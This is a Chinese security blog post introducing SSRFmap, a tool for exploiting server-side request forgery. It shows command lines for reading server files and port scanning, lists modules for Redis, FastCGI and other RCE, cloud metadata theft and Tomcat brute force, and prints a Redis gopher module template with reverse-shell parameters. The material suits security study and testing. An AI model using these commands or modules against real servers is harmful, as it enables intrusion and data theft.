ssrf模糊匹配工具(ssrfmap)

admin 2023年2月27日15:14:45评论162 views字数 2196阅读7分19秒阅读模式

SSRF

SSRF (Server-Side Request Forgery) 即服务端请求伪造,从字面意思上理解就是伪造一个服务端请求,也即是说攻击者伪造服务端的请求发起攻击,攻击者借由服务端为跳板来攻击目标系统。

漏洞影响

利用SSRF可以进行内外网的端口和服务探测、主机本地敏感数据的读取、内外网主机应用程序漏洞的利用等等,可以说SSRF的危害不容小觑了。

ssrfmap工具介绍

SSRFmap,利用它可检测与利用 SSRF 漏洞, 同时它也整合了一些常用漏洞可以结合 SSRF 去利用,比如 fastjson、mysql、github 的一些历史漏洞,还有端口扫描、读取文件等利用功能,都是实用的漏洞利用能力。

实战演示案例

SSRFmap工具的data目录下有一个example.py文件,用来检测框架是否能够正常运行,它这个文件就是用来搭建一个ssrf的漏洞环境

ssrf模糊匹配工具(ssrfmap)

ssrf模糊匹配工具(ssrfmap)使用抓包软件yakit抓取一个存在ssrf的漏洞数据包

ssrf模糊匹配工具(ssrfmap)

读文件

python ssrfmap.py -r 1.txt -p url -m readfiles-r:指定数据包-p:指定漏洞参数-m:指定检测的模块

ssrf模糊匹配工具(ssrfmap)

扫描端口

python ssrfmap.py -r 1.txt -p url -m portscan

ssrf模糊匹配工具(ssrfmap)

功能模块

SSRFmap已整合了下列功能模块,大家可以使用-m参数来选择使用:

模块名称 模块描述
fastcgi FastCGI RCE
redis Redis RCE
github Github企业版RCE < 2.8.7
zabbix Zabbix RCE
mysql MySQL命令执行
docker Docker  InfoleaksAPI
smtp SMTP邮件发送
Portscan 主机端口扫描
networkscan HTTP Ping  sweep
readfiles 文件读取,例如/etc/passwd
alibaba 从供应商处读取文件 (例如: meta-data,  user-data)
aws 从供应商处读取文件 (例如: meta-data,  user-data)
gce 从供应商处读取文件 (例如: meta-data,  user-data)
digitalocean 从供应商处读取文件 (例如: meta-data,  user-data)
socksproxy SOCKS4 代理
smbhash 通过UNC Path破解SMB认证
tomcat 爆破Tomcat Manager

如果各位想针对特定服务添加自己的功能模块,可以参考下面这个模板代码:

from core.utils import *
import logging
name          = "servicename inlowercase"
description   = "ServiceName RCE - What does itdo"
author        = "Name or pseudo of theauthor"
documentation= ["http://link_to_a_research", "http://another_link"]
class exploit():
    SERVER_HOST = "127.0.0.1"
    SERVER_PORT = "4242"
    def __init__(self, requester, args):
        logging.info("Module '{}' launched!".format(name))
        # Handle args for reverse shell
        if args.lhost == None: self.SERVER_HOST= input("Server Host:")
        else:                  self.SERVER_HOST = args.lhost
        if args.lport == None: self.SERVER_PORT= input("Server Port:")
        else:                  self.SERVER_PORT = args.lport
        # Data for the service
        # Using a generator to create the hostlist
        # Edit the following ip if you need totarget something else
        gen_host =gen_ip_list("127.0.0.1", args.level)
        for ip in gen_host:
            port = "6379"
            data ="*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a"
            payload = wrapper_gopher(data, ip ,port)
            # Handle args for reverse shell
            payload = payload.replace("SERVER_HOST",self.SERVER_HOST)
            payload =payload.replace("SERVER_PORT", self.SERVER_PORT)
            # Send the payload
            r =requester.do_request(args.param, payload)

 


下载

https://github.com/swisskyrepo/SSRFmap

 

免责声明
由于传播、利用本公众号鹏组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号鹏组安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

原文始发于微信公众号(鹏组安全):ssrf模糊匹配工具(ssrfmap)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月27日15:14:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ssrf模糊匹配工具(ssrfmap)https://cn-sec.com/archives/1577481.html

发表评论

匿名网友 填写信息